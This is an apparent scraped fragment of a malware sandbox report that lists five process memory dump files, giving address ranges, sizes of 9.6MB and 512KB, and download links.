                    • memory/3316-14644-0x000007FEF4CD0000-0x000007FEF566D000-memory.dmp

                      Filesize

                      9.6MB

                      Download

                    • memory/3316-14645-0x0000000002A60000-0x0000000002AE0000-memory.dmp

                      Filesize

                      512KB

                      Download

                    • memory/3316-14646-0x0000000002A60000-0x0000000002AE0000-memory.dmp

                      Filesize

                      512KB

                      Download

                    • memory/3316-14647-0x0000000002A60000-0x0000000002AE0000-memory.dmp

                      Filesize

                      512KB

                      Download

                    • memory/3316-14649-0x000007FEF4CD0000-0x000007FEF566D000-memory.dmp

                      Filesize

                      9.6MB

                      Download